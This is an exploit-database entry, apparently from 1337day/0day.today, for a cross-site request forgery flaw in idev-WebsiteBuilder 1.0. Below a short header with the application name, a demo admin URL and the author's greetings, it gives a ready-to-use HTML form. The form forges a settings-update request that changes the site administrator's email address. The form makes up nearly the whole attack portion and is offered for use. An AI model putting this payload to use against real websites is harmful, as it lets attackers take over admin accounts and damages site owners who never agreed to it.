idev-WebsiteBuilder 1.0 CSRF Vulnerability

2012-04-05T00:00:00
ID 1337DAY-ID-17976
Type zdt
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            < ------------------- header data start ------------------- >

#############################################################

# Application Name    :  idev-WebsiteBuilder 1.0

# Vulnerable Type     :  CSRF

# Demo                :  http://idevspot.com/demos/idev-websitebuilder/admin

# Author              :  Jonturk75

# Greetz: Inj3ct0r Exploit DataBase 1337day.com

#############################################################

< ------------------- header data end of ------------------- >


<form action="../library/query.php?addphoto=1" method="post" name="form1" enctype="multipart/form-data" id="form1">
<input type="hidden" name="controller" value="SETTINGS~update~settings~1" />
<input type="hidden" name="EMAIL" class="textarea100" value="[email protected]">
<input type="hidden" name="AFFID" class="textarea100" value="">
<input type="submit" name="Submit" value="Submit" />
</form>


< -- bug code end of -- >



#  0day.today [2018-04-09]  #